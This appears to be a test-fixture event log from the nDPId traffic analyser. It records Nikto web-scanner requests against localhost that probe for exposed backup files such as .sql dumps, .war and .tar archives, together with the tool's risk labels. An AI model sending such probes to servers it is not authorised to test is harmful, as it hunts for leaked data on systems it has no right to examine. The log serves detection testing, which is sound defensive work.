00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
